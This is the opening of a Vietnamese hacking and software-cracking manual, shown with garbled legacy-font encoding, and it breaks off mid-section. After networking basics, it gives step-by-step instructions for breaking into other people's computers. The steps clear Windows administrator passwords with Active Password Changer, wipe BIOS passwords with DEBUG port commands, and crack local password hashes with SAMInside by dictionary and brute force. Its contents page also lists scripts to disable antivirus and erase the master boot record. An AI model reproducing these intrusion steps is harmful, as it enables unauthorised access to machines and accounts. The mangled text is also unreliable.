Cong Cu Hack May Tinh Va Crack Phan Mem(Vu Dinh Cuong)

2 PC2 PC

Muïc Luïc

CHÖÔNG 1: CAÙC KHAÙI NIEÄM CÔ BAÛN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .41. Ñòa chæ IP (IP Address) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .42. Söï khaùc nhau giöõa hostname vaø ñòa chæ IP . . . . . . . . . . . . . . . . . . . . . . . . . . . .43. IP spoofing laø gì? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .44. Coång aûo laø gì? (Virtual Port) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .45. RFC laø gì? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .56. DNS laø gì? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .57. Thôøi Gian Soáng (Time To Live) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .58. Khaùi nieäm "Time Out" . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .5

CHÖÔNG 2: GIÔÙI THIEÄU CAÙC COÂNG CUÏ HACK . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6

I. CAÙC COÂNG CUÏ HACK MAÙY TÍNH . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .61. Loaïi boû password Administrator baèng Active Password Changer 3.0 . . . . . . . . . . .62. Loaïi boû Password Bios . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .83. Höôùng daãn Crack Password . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .84. Crack Password Administrator baèng SAMInside . . . . . . . . . . . . . . . . . . . . . . . . .105. Crack Password baèng L0pht Crack (LC4) . . . . . . . . . . . . . . . . . . . . . . . . . . . . .12

II. GIÔÙI THIEÄU MOÄT SOÁ SCRIPTS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .141. Khoâng cho khôûi ñoäng maùy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .142. Disable NAV . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .143. Hieån thò message moãi khi reboot maùy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .144. Hieån thò doøng leänh moãi khi nhaáp vaøo moät file hay folder . . . . . . . . . . . . . . . . .145. Disable Registry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .146. Chöông trình xoùa Master boot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .14

III. TROJAN-VIRUS-WORM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .151. Caên baûn veà Trojan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .152. Tìm hieåu moät vaøi Trojan thoâng duïng . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .203. Virus vaø tìm hieåu virus . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .254. Worm . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .27

IV. HACK MAÄT KHAÅU TREÂN TAÄP TIN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .291. Chöông trình Advanced Office 2000 Password Recorvery . . . . . . . . . . . . . . . . . .29

Please purchase PDFcamp Printer on http://www.verypdf.com/ to remove this watermark.

http://www.verypdf.com/

PC 3

2. Chöông trình Advanced ZIP Password Recorvery . . . . . . . . . . . . . . . . . . . . . . .313. Chöông trình Advanced PDF Password Recorvery Pro . . . . . . . . . . . . . . . . . . . .32

CHÖÔNG 3: CRACK VAØ CAÙC COÂNG CUÏ CRACK . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .331. Crack phaàn meàm baèng Diassembler . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .332. Crack phaàn meàm baèng DateCrck . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .36

CHÖÔNG 4: CAÙC THUÛ THUAÄT HACK . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .381. Laøm theá naøo khi Registry bò khoùa . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .382. Caùc giaûi phaùp . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .38

2.1 Söû duïng Group Policy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .382.2 Söû duïng Scripts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .38

3. Loaïi boû caùc chöông trình haïn cheá ngöôøi duøng . . . . . . . . . . . . . . . . . . . . . . . . .393.1 Giôùi thieäu . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .393.2 Duøng PrcView V 3.7.3.1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .403.3 Khoùa maùy tính baèng ñóa meàm . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .403.4 Loaïi boû Deep Free baèng Deep UnFree 1.6 . . . . . . . . . . . . . . . . . . . . . . . .413.5 Phöông phaùp môû coång ñôn giaûn . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .413.6 Xoùa daáu veát . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .42



4 PC

1. Ñòa chæ IP (IP Address)Khi moät maùy tính keát noái vaøo maïng

(Internet) thì ñòa chæ IP ñoù laø duy nhaát. Tuynhieân, ñòa chæ naøy chöa haún laø coá ñònh.Neáu baïn keát noái maïng thoâng qua ISP thì soáIP seõ thay ñoåi ôû caùc laàn keát noái.

2. Söï khaùc nhau giöõa hostname vaø ñòa chæIP

Ñôn giaûn chæ laø vieäc goïi teân. Ví duïwww.yourname.com seõ deã hôn nhieàu ñoáivôùi vieäc phaûi goïi 202.32.156.14. Tuy vaäy, coùsöï khaùc bieät quan troïng giöõa hai ñieàu naøy,IP laø soá duøng ñeå xaùc ñònh thieát bò (device)coøn hostname laø moái lieân keát giöõa moät töøkhoùa vaø soá IP. Moät ñòa chæ IP coù theå coùnhieàu hostname khaùc nhau nhöng moäthostname thì chæ coù moät IP lieân keát vôùi noù.

Ñòa chæ IP goàm 4 chöõ soá, caùch nhau bôûidaáu chaám vaø coù giôùi haïn töø 0 - 255. Moãi soáñöôïc löu bôûi moät byte neân IP coù kích thöôùclaø 4 byte, ñöôïc chia thaønh caùc lôùp ñòa chæA, B vaø C. Neáu ôû lôùp A, baïn coù theå coù 16trieäu ñòa chæ, ôû lôùp B coù 65536 ñòa chæ. Víduï: ÔÛ lôùp B coù 132.25, chuùng ta coù taát caûñòa chæ töø 132.25.0.0 ñeán 132.25.255.255.Phaàn lôùn ñòa chæ ôû lôùp A laø sôû höõu cuûa caùccoâng ty hay cuûa toå chöùc. Thoâng thöôøng,nhaø cung caáp dòch vuï ISP sôû höõu moät vaøiñòa chæ lôùp B hoaëc C. Ví duï: Neáu ñòa chæ IPcuûa baïn laø 132.25.23.24 thì baïn coù theå xaùcñònh ISP cuûa baïn laø ai (coù IP laø 132.25.x.).

3. IP spoofing laø gì? Spoof IP coù hieäu quaû laø khi baïn vöôït

qua Firewall, laáy caép account vaø caàn daáuthoâng tin caù nhaân, khi duøng chöùc naêng naøythì chuùng ta khoâng nhaän ñöôïc thoâng tinphaûn hoài chính xaùc, vì ñòa chæ IP ñaõ ñöôïcgiaû maïo sang moät ñòa chæ IP khaùc.

4. Coång aûo laø gì? (Virtual Port) Ñònh nghóa coång aûo: Laø moät soá nguyeân

ñöôïc ñoùng goùi trong TCP (TranmissionControl Protocol) vaø UDP (User DiagramProtocol). ÖÙng vôùi moãi chöông trình trongWindows seõ duøng moät coång rieâng ñeåtruyeàn vaø nhaän döõ lieäu. Ví duï maùy coù ñòachæ IP laø 127.0.0.1 chaïy WebServer, FTPServer, POP3 server… thì nhöõng dòch vuïnaøy ñeàu ñöôïc chaïy treân moät ñòa chæ IP laø127.0.0.1. Khi moät goùi tin ñöôïc göûi ñeán, laømtheá naøo maùy tính cuûa chuùng ta phaân bieätñöôïc goùi tin naøy ñi vaøo dòch vuï naøoWebServer hay FTP server hay SMTP? Vìvaäy, khaùi nieäm Port xuaát hieän. Moãi dòch vuïcoù moät Port maëc ñònh, ví duï FTP coù portmaëc ñònh laø 21, web service coù port maëcñònh laø 80, POP3 laø 110, SMTP laø 25. Ngoaøira, baïn coù theå thay ñoåi Port maëc ñònh baèngPort mapping. Ñieàu naøy raát ñôn giaûn chæ laøquaù trình chuyeån ñoåi soá port maëc ñònh cuûamoät dòch vuï naøo ñoù thaønh moät port khaùc.Ví duï Port maëc ñònh cuûa WebServer laø 80nhöng thænh thoaûng baïn vaãn thaáyhttp://www.xxx.com:8080/ , 8080 ôû ñaây

CÔ BAÛN

Chöông 1

CAÙC KHAÙI NIEÄM



http://www.yourname.com

http://www.xxx.com:8080/

PC 5

chính laø soá port cuûa host xxx nhöng ñaõñöôïc ngöôøi quaûn trò cuûa host naøy chuyeånñoåi (map) töø 80 thaønh 8080.

5. RFC laø gì? RFC vieát taét cuûa Request For Comments,

laø taäp hôïp nhöõng taøi lieäu veà kieán nghò, ñeàxuaát vaø nhöõng lôøi bình luaän lieân quan tröïctieáp hoaëc giaùn tieáp ñeán coâng ngheä, giaothöùc maïng Internet. Caùc taøi lieäu RFC ñöôïcchænh söûa, thay ñoåi ñeán khi taát caû caùc kyõsö thaønh vieân cuûa IETF (InternetEngineering Task Force) ñoàng yù vaø duyeät,sau ñoù nhöõng taøi lieäu naøy ñöôïc xuaát baûn vaøcoâng nhaän laø moät chuaån giao thöùc choInternet. Taøi lieäu RFC noåi tieáng vaø taïo ñöôïctieáng vang lôùn nhaát laø taøi lieäu RFC soá 822veà Internet Email bôûi Dave Crocker.

Trang chuû cuûa RFC:http://www.ietf.org/rfc.html

6. DNS laø gì? DNS vieát taét cuûa Domain Name Server.

Moät maùy chuû DNS keát noái ôû port 53, coùnghóa laø neáu baïn muoán keát noái vaøo maùychuû naøy, baïn caàn phaûi keát noái thoâng quaport 53. Maùy chuû chaïy DNS phaân giaûi host-name thaønh caùc chöõ soá töông öùng vaø ngöôïclaïi. Ví duï: 127.0.0.1 -> localhost vaø localhost-> 127.0.0.1

7. Thôøi Gian Soáng (Time To Live) Nhö baïn ñaõ bieát Internet laø moät maïng

raát roäng lôùn. Ñeå ñaûm baûo caùc goùi döõ lieäuñeán ñöôïc maùy ñích thì quaû laø moät vaán ñeà.Vì theá khaùi nieäm "Time To Live" ra ñôøi.Trong tröôøng hôïp nhöõng goùi tin naøy khoângñeán ñöôïc maùy ñích sau khi ñaõ ñi qua moätsoá router (soá naøy ñaõ ñöôïc maëc ñònh tröôùc)thì noù seõ töï phaân huûy.

Time To Live (TTL) laø thôøi gian goùi döõ

lieäu toàn taïi treân maïng tröôùc khi noù bò boûqua. Ngöôøi göûi döõ lieäu ñi seõ xaùc ñònh moätgiaù trò TTL tröôùc, thöôøng laø töø 32 -> 64. Giaùtrò naøy seõ ñöôïc giaûm ñi khi ñöôïc chuyeånqua boä ñònh tuyeán treân maïng (router). Khigiaù trò naøy baèng 0, datagram naøy bò boû quavaø giao thöùc ICMP (Internet ControlMessage Protocol) seõ baùo loãi veà cho ngöôøigöûi. Ñieàu naøy seõ traùnh cho datagram naøy ñivaøo moät voøng laëp voâ taän qua caùc boä ñònhtuyeán.

Moãi boä ñònh tuyeán khi nhaän ñöôïc IPdatagram seõ giaûm giaù trò TTL cuûa datagramnaøy ñi moät. Haàu heát caùc boä ñònh tuyeán ñeàukhoâng giöõ laïi datagram naøy trong thôøi gianquaù 1 giaây tröôùc khi chuyeån datagram naøyñi. Neân giaù trò TTL coù theå coi baèng hop(counter) = soá boä ñònh tuyeán maø datagramnaøy vöøa vöôït qua.

Khi boä ñònh tuyeán nhaän ñöôïc moät data-gram coù tröôøng TTL baèng 0 hoaëc 1, noù seõkhoâng chuyeån datagram naøy ñi tieáp. Thayvaøo ñoù, noù seõ boû qua datagram naøy vaø göûimoät ICMP message "Time Exceeded" (quaùthôøi gian) trôû laïi cho ngöôøi ñaõ göûi datagramnaøy! Vì ICMP message maø boä ñònh tuyeángöûi trôû laïi cho ngöôøi göûi coù ñòa chæ nguoàn- source address laø ñòa chæ IP cuûa boä ñònhtuyeán neân ngöôøi gôûi coù theå bieát ñöôïc ñòachæ IP cuûa router naøy.

8. Khaùi nieäm "Time Out" "Time out" ñöôïc duøng ñeå mieâu taû

khoaûng thôøi gian maùy A göûi moät goùi tin chomaùy B nhöng khoâng nhaän ñöôïc traû lôøi töømaùy B. Ví duï, khi baïn keát noái vaøo moät serv-er chat naøo ñoù chaúng haïn nhö Vieät chat,baïn nhaáp vaøo nuùt Connectnhöng saukhoaûng moät phuùt vietchat server vaãn chöatraû lôøi. Ñaây goïi laø time out.

0000000000



http://www.ietf.org/rfc.html

6 PC

I. CAÙC COÂNG CUÏ HACK MAÙY TÍNH1. Loaïi boû password Administrator baèng Active Password Changer 3.01.1 Giôùi thieäu

- Khi baïn muoán xaâm nhaäp vaøo moät maùy tính naøo ñoù thì luoân gaëp moät soá trôû ngaïi nhöcaàn phaûi ñaêng nhaäp baèng password BIOS, Password Administrator, hoaëc moät soá passwordcuûa moät soá phaàn meàm baûo maät khaùc. Vì lyù do naøy, toââi xin giôùi thieäu moät soá coâng cuï nhaèmgiuùp baïn khaéc phuïc trôû ngaïi naøy.

- Vôùi Active Password Changer, baïn hoaøn toaøn coù theå xaâm nhaäp vaøo maùy tính moät caùchdeã daøng vaø hieäu quaû.

1.2 Höôùng daãn söû duïng1 Khôûi ñoäng maùy tính baèng ñóa CD (ñóa

Hirent 's Boot 8.0), maøn hình Boot cuûañóa nhö sau (xem hình 1.1).

2 Duøng phím muõi teân ñeå di chuyeånthanh saùng hoaëc duøng caùc soá cuûamenu Boot (caùc soá coù giaù trò nguyeânbaét ñaàu töø 1). Ñeå thöïc hieän, nhaánphím soá 9hoaëc di chuyeån thanh saùngñeán menu Nextsau ñoù nhaán Enter(xem hình 1.2).

3 Di chuyeån thanh saùng ñeán menuPassword & Registry Tools… nhaánEnterñeå tieáp tuïc (xem hình 1.3).

4 Di chuyeån thanh saùng ñeán menuActive Password Changer 3.0(NT/2000/XP/2003), nhaán Enter ñeåtieáp tuïc.Baïn ñôïi moät chuùt ñeå chöông trình ñöôïcgiaûi neùn leân RAM. Sau khi quaù trình

IÔ ÙI TH IEÄU C A ÙC C O ÂN G C U Ï H A C K

Hình 1.1: Maøn hình Boot cuûa CD Hirent Boot CD 8.0

Hình 1.2: Maøn hình Boot tieáp theo cuûa Hirent's BootCD

Chöông 2



PC 7

giaûi neùn hoaøn taát, giao dieän cuûa chöôngtrình nhö hình 1.4.

5 Chöông trình goàm coù 3 tuøy choïn sau:+ Neáu bieát roõ heä ñieàu haønh ñöôïc caøi treânoå ñóa naøo thì nhaán soá 1 (Choose LogicalDrive).+ Neáu baïn khoâng bieát roõ heä ñieàu haønhñöôïc caøi treân oå naøo thì baïn nhaán soá 2(Search for MS SAM Databases on all harddisks and Logical drives).+ Neáu khoâng muoán chaïy chöông trình naøynöõa thì nhaán soá 3.Trong ví duï naøy, toâi choïn 1, nhaán Enterñeåtieáp tuïc.6 Nhaäp vaøo Partition chöùa heä ñieàu haønh

(caùc Partition ñöôïc ñaùnh soá töø 0) (xemhình 1.5). Nhaán Enterñeå tieáp tuïc.

Luùc naøy, chöông trình seõ tìm trong oå ñóa

hieän haønh taäp tin SAM vaø lieät keâ danh saùchcaùc Accounts hieän coù vaø thoáng keâ thaønhmoät danh saùch theo soá thöù töï baét ñaàu töø 0(xem hình 1.6).

7 Nhaäp vaøo Account muoán loaïi boûPassword baèng caùch nhaán phím soá, giaûsöû toâi muoán loaïi boû PasswordAdministrator, nhaäp soá 0. Sau ñoù, nhaánEnterñeå tieáp tuïc.

8 Ñaùnh daáu choïn muïc Password NeverExpires(Password khoâng bao giôø heáthieäu löïc) vaø muïc Clear this user'spassword (loaïi boû password accountnaøy) baèng phím Spacebar(xem hình1.7).

9 Nhaán phím Yñeå loaïi boû Password, luùcnaøy xuaát hieän giao dieän cuûa chöôngtrình (xem hình 1.8).

Hình 1.3: Maøn hình Password Tools

Hình 1.4: Giao dieän Active Password Changer 3.0

Hình 1.6: Danh saùch caùc Accounts

Hình 1.7: Ñaùnh daáu caùc muïc choïn

Hình 1.8: Quaù trình loaïi boû password

Hình 1.5: Danh saùch caùc Partition



8 PC

10 Nhaán moät phím baát kyø ñeå trôû veà menuchính.

Sau khi ñaõ loaïi boû Password thaønhcoâng, baïn coù theå ñaêng nhaäp vaøo maùy tínhvôùi taøi khoaûn Administrator maø khoâng caànPassword. Sau khi ñaõ ñaêng nhaäp ñöôïc vaøomaùy tính cuûa ngöôøi khaùc thì baïn coù theåhoaøn toaøn quyeát ñònh moïi taøi nguyeân hieäncoù trong maùy tính naøy.

2. Loaïi boû Password BIOS2.1 Giôùi thieäu

Password BIOS laø moät password ñöôïclöu trong Bios cuûa MainBoard. Coù nhieàucaùch ñeå loaïi boû password naøy. Caùch coåñieån laø baïn thaùo naép maùy tính vaø thaùo PinBIOS hoaëc coù theå lieân heä vôùi nhaø saûn xuaátphaàn cöùng ñeå hoï cung caáp cho baïn pass-word maëc ñònh cuûa BIOS. Caùch maø toâimuoán giôùi thieäu cuøng baïn seõ ñôn giaûn hônmaø khoâng caàn phaûi thaùo caùc thieát bò phaàncöùng.

Khi Password BIOS ñöôïc caøi ñaët thìtröôùc khi khôûi ñoäng, heä thoáng yeâu caàunhaäp password. Neáu password ñuùng thìmôùi cho ñaêng nhaäp ngöôïc laïi thì khoâng.Password nhaäp sai qua 3 laàn thì maùy tínhseõ khôûi ñoäng laïi hoaëc treo maùy (xem hình1.9).

2.2 Caùch thöïc hieän*Loaïi boû Password BIOS baèng Debug1 Vaøo Start > Run…, goõ cmd, nhaánEnter.

2 Nhaäp vaøo ñoaïn maõ sau:Debugo 70 2fo 71 ff

q (nhaán phím naøy ñeå thoaùt khoûi Debug)(xem hình 1.10).

*Loaïi boû password BIOS baèng chöôngtrình hôïp ngöõ trong Debug

Töø daáu nhaéc leänh cuûa maøn hình DOS,nhaäp chöõ Debug, sau ñoù nhaäp vaøo ñoaïnmaõ sau:

Debug-Amov ax,0mov ax,cxout 70,almov ax,0out 71,alinc cxtb 103int 20q (ñeå thoaùt khoûi debug).

3. Höôùng daãn Crack Password 3.1 Giôùi thieäu

Nhö caùc baïn ñaõ bieát ñeå baûo veä moät heäthoáng thì vieäc baûo maät password luoân ñöôïccoi troïng. Vì vaäy, phaàn naøy seõ giuùp baïn tìmhieåu moät chöông trình beû khoùa password.

Coù raát nhieàu caùch ñeå baûo maät passwordtrong moät heä thoáng. Ñoù laø söï keát hôïp giöõa3 yeáu toá:

- Something you know- Something you are- Something you haveTheá naøo laø moät chöông trình beû khoùa

(password cracker)? Vaø moät hacker ñoaùnpassword nhö theá naøo?

Password cracker laø moät chöông trình coù

Hình 1.9: Nhaäp Password BIOS

Hình 1.10: Loaïi boû Password Bios baèng maõ Debug



PC 9

khaû naêng giaûi maõ hoaëc voâ hieäu hoùa pass-word. Haàu heát caùc password cracker laømcoâng vieäc laø xem xeùt caùc böôùc maõ hoùapassword ñeå phaù vôõ noù (crack) hay dòchngöôïc noù laïi. Kyõ thuaät naøy seõ ñöôïc moâ taûkyõ hôn ôû caùc phaàn sau.

Khoâng phaûi ngöôøi naøo cuõng quan taâmñeán vieäc löïa choïn moät password an toaøn.Neáu password coù trong töø ñieån thì chaécchaén password ñoù deã daøng bò beû gaõy(crack). Chæ coù nhöõng ngöôøi ñaõ coù kinhnghieäm vaø raát caån thaän môùi quan taâm ñeánñieàu ñoù. Tuy nhieân, hoï laïi khoâng ngôø raèngpassword naèm trong moät thö muïc naøo ñoùhoaëc coù nhöõng ngöôøi khoâng caàn choïn pass-word phöùc taïp bôûi vì hoï khoâng coù taäp tinquan troïng. Taát caû ñieàu naøy daãn ñeán heäthoáng bò nguy hieåm bôûi nhöõng hacker vaønhöõng coã maùy crack sieâu haïng.

Moät vaøi heä thoáng cho pheùp baïn ñoätnhaäp vôùi nhöõng user nhö "demo" hay"guest" maø khoâng caàn bieát password, goïi laødefault password. Vì sao coù default pass-word? Ñaây laø lyù do:

Nhaân vieân cuûa moät cô quan (hay thaønhvieân cuûa toå chöùc) ñöôïc pheùp quaûn lyù moätsoá taøi nguyeân nhaát ñònh maø ngöôøi chuû(admin) cho pheùp baèng caùch duøng defaultpassword. Vaø trong tröôøng hôïp admin laømoät ngöôøi baän roän vôùi coâng vieäc, hoï luoânñaët password sao cho deã nhôù("love","money",…) hoaëc ñôn giaûn pass-word chæ laø moät khoaûng traéng. Nhieàu hack-er thöôøng thöû caùc default password, ñoaùnpassword tröôùc khi nghó caùc keá saùch tinh vihôn. Caùc accounts cuûa user thöôøng bò hack-er taán coâng tröôùc ñeå laáy password vaø ñoätnhaäp vaøo moät heä thoáng vôùi user ñoù. Chæ khiñaõ an toaøn trong heä thoáng, ngöôøi taán coângseõ tieán haønh vieäc getadmin, ñaùnh caép filechöùa password ñeå giaûi maõ... vaø... chaéc caùcbaïn cuõng ñoaùn ñöôïc phaûi khoâng?

3.2 Password coù ñöôïc heä thoáng baûo veä toátkhoâng?

Ñaàu tieân phaûi keå ñeán coâng cuï taïo pass-word (password generator), noù seõ giuùp maõ

hoùa password baïn nhaäp vaøo. Haàu heát caùccoâng cuï naøy söû duïng vaøi quy taéc maõ hoùanaøo ñoù. Caùc baïn coù theå tìm ñöôïc treânInternet moät trang web trình baøy raát chi tieátcaùc caùch maõ hoùa khaùc nhau. Trong muïcnaøy toâi seõ chæ neâu leân moät ñònh nghóa ngaéngoïn vaø chung nhaát cho taát caû caùch maõ hoùa. Maõ hoùa (Cryptography) ñöôïc ñònh

nghóa laø "moät kieåu vieát chöõ ñaëc bieät döïatreân khoa hoïc vaø trí tueä (the science andstudy of secret writing)" hay noùi caùch khaùc,ñoù laø caùch döõ lieäu ñöôïc baûo veä (encode)traùnh khoûi baøn tay cuûa nhöõng ngöôøi coá yùmuoán xem troäm hay phaù phaùch...Coù theåduøng kyù töï, chöõ soá hay baát kyø phöông thöùcnaøo, sao cho chæ coù nhöõng ngöôøi thöïc söïbieát caùch môùi coù theå xem ñöôïc noäi dungthöïc söï cuûa noù.

Coù hai loaïi heä thoáng maõ hoùa: - Ñoái xöùng - Khoâng ñoái xöùng Heä thoáng maõ hoùa ñoái xöùng duøng nhöõng

töø khoùa gioáng nhau (töø khoùa ñaëc bieät) ñeåmaõ hoùa cuõng nhö giaûi maõ moät thoâng ñieäp(ñöôïc xaùc nhaän trong Windows).

Heä thoáng maõ hoùa khoâng ñoái xöùng söûduïng moät töø khoùa (töø khoùa chung, coângkhai) ñeå maõ hoùa vaø moät töø khoùa khaùc (töøkhoùa rieâng, bí maät) ñeå giaûi maõ. Heä thoángnaøy coøn ñöôïc goïi vôùi moät caùi teân khaùc laø"Heä thoáng maät maõ söû duïng töø khoùa chung(Public key cryptosytems) (PKC).

Chuùng ta laáy moät ví duï veà thuaät toaùnchuaån maõ hoùa döõ lieäu (Data EncryptionStandard DES) vaø xem noù hoaït ñoäng nhötheá naøo. Password ñöôïc laáy töø moät vaên baûnvaø söû duïng password maø nhieàu ngöôøi öachuoäng: Password.

Password naøy söû duïng moät töø khoùa ñeåmaõ hoùa chuoãi giaù trò 0 (series of zeros) (64in all) vaø sau khi thöïc thi, giaù trò naøy seõthay ñoåi. Keát quaû sau khi ñaõ chuyeån sangmaät maõ ñöôïc ghi vaøo moät vaên baûn troáng.Trong cuoäc kieåm tra cuûa chuùng toâi treân heäthoáng Win2000 keát quaû cho ra8846F7EAEE8FB117AD06BDD830B7586C.



10 PC

Ñaây laø moät caùch maõ hoùa cuûa heä thoáng maõhoùa ñoái xöùng.

Ñeå giaûi maõ hay maõ hoùa (encode) caùcñoaïn maõ treân thì coâng vieäc ñaàu tieân laø baïnphaûi coù caùc coâng cuï giaûi maõ coøn goïi laø coãmaùy doø tìm passwords, caùc coâng cuï naøy seõgiuùp baïn thoâng qua moät boä töø ñieån maø baïncung caáp cho noù.

Baïn coù theå download boä töø ñieån naøy taïiwww.freewebtown.com/vudinhcuong/Dictionary.zip hoaëc http://www.dvpub.com.vn

Toâi xin giôùi thieäu vôùi baïn hai chöôngtrình crack password noåi tieáng SAMInsidevaø L0pht crack duøng ñeå crack password cuûaWindowsNT/2000/XP.

4. Crack Password Administrator baèngSAMInside4.1 Giôùi thieäu

Neáu baïn muoán xaâm nhaäp vaøo maùy tínhmoät caùch an toaøn vaø chuyeân nghieäp thìtrong muïc Reset password baèng ActivePassword Changer V3.0 chöông 1, toâi ñaõgiôùi thieäu loaïi boû password Admin thì vôùichöông trình naøy, baïn caàn loaïi boû passwordUser. Sau khi ñaõ xaâm nhaäp vaøo maùy tính,duøng tröông trình Crack naøy ñeå tìm pass-word Administrator sau ñoù ñaêng nhaäp baèngpassword ñaõ tìm ñöôïc.

4.2 Caùch thöïc hieänMoät chöông trình Crack password raát

hay ñoù laø SAMInside. Giao dieän cuûa chöôngtrình nhö sau (xem hình 1.11). Ñòa chæ taûichöông trình:

http://www.freewebtown.com/vudinhcuong/saminside.zip hoaëc http://www.dvpub.com.vn.

Ñaây laø chöông trình raát nheï baïn khoângcaàn phaûi caøi ñaët chæ caàn chaïy fileSAMInside. Ñeå chaïy ñöôïc file naøy, baïn phaûiñaêng kyù noù baèng caùch chaïy fileGetSysKey.exe vaø GetHashes.exe trongcuøng thö muïc.Böôùc 1: Töø giao dieän chính cuûa chöôngtrình, vaøo menu File > Import from local

machine using LSASSñeå lieät keâ caùc taøikhoaûn hieän coù cuûa maùy tính (xem hình1.12).

Böôùc 2:Môû trình soaïn thaûo Notepad, nhaäpvaøo noäi dung baát kyø hoaëc töông töï nhöhình 1.13 vaø ñaët teân Dic.txt. Ñaây laø file töøñieån chöùa danh saùch caùc töø baïn töï ñònhnghóa. Khi chöông trình thöïc thi noù seõ goïiñeán file naøy vaø ñoïc döõ lieäu, sau ñoù thöïchieän giaûi maõ vaø so saùnh.

Böôùc 3:Nhaán phím F9 ñeå caáu hình (xemhình 1.14).

Hình 1.11: Giao dieän cuûa SAMInside

Hình 1.12: Lieät keâ danh saùch caùc Account

Hình 1.13: Laäp töø ñieån password



http://www.freewebtown.com/vudinhcuong/Dicti

http://www.dvpub.com.vn

http://www.freewebtown.com/vudinh


PC 11

Böôùc 4:Treân theû General, ñaùnh daáu choïnvaøo caùc muïc:- Ferform "Intellectual" check of password:Ñaây laø löïa choïn chöông trình kieåm tra pass-word moät caùch thoâng minh.- Check earlier found password fromSAMInside.DIC file: Löïa choïn naøy giuùpchöông trình thöïc hieän kieåm tra caùc pass-word chöùa trong file SAMInside.dic tröôùctieân.- Play sound file on password found:Chöông trình seõ chaïy aâm thanh *.waw ñeåthoâng baùo ñaõ tìm thaáy password thaønhcoâng. Böôùc 5:Nhaáp choïn theû Brute-ForceAttack, ñaùnh daáu choïn vaøo muïc LatinCapital Simbols[A…Z](ñeå kieåm tra caùcpassword coù kyù töï töø A ñeán Z).Böôùc 6:Treân theû Dictionary Attack-1, nhaápnuùt Add ñeå daãn ñeán file Dic.txt baïn ñaõsoaïn tröôùc ñoù (xem hình 1.15).

Böôùc 7:Nhaáp choïn theû Dictionary Attack-2. Theû naøy goàm coù 2 tuøy chænh sau:+ Trong khung Also Check in the Dictiona-ries, nhaáp choïn caùc muïc sau:.Double words (adminadmin): Gaáp ñoâitöø caàn tìm..Reversed words (nimda): Boû bôùt töø caàntìm..Substring with length not less than,Simbols: Thöïc hieän tìm treân chuoãi con coùñoä daøi khoâng nhoû hôn kích thöôùc chæ ñònh(maëc ñònh moät chuoãi laø 128 kyù töï)..Words, Excluding Symbols: Töø loaïi rakhoâng tìm (baïn nhaäp töø caàn loaïi ra vaøokhung).+ Trong khung Additionally Check, nhaápchoïn muïc sau:.User Name: Tìm password truøng vôùiUser Name..Previously found passwords from theSAMInsinde.DIC file: Tìm caùc passwordñöôïc löu trong file SAMInside.Dic..Adjacent Keys Combinations ("123","qwert", etc): Tìm caû nhöõng kyù töï gaàn keàvôùi nhau (xem hình 1.16).

Sau khi ñaõ caáu hình xong, nhaáp OK ñeåquay veà chöông trình.Böôùc 8:Neáu baïn muoán chöông trình thöïchieän crack password baèng töø ñieån vöøa soaïnthì nhaáp vaøo bieåu töôïng , choïnDictionary attack(xem hình 1.17).

Hình 1.14: Ñieàu chænh caùc löïa choïn

Hình 1.15: Ñöa file Dic.txt vaøo

Hình 1.16: Dictionary Attack-2



12 PC

Böôùc 9:Vaøo menu Service > Start Attackhoaëc nhaán F4.Khi ñoù, chöông trình seõ thöïc hieän Attack vaøkeát quaû nhö sau (xem hình 1.18).

5. Crack Password baèng L0phtcrack(LC4)5.1 Giôùi thieäu

Ñeå crack password Admin thì ñaây laømoät chöông trình noåi tieáng vaø chuyeânnghieäp. Noù coù theå crack ñöôïc haàu heát caùcpassword cho duø password coù ñöôïc maõ hoùabaèng caùc thuaät toaùn phöùc taïp ñeán ñaâu ñichaêng nöõa thì ñoái vôùi L0pht crack cuõngkhoâng phaûi laø vaán ñeà.Baïn coù theå download chöông trình taïi ñòachæ:

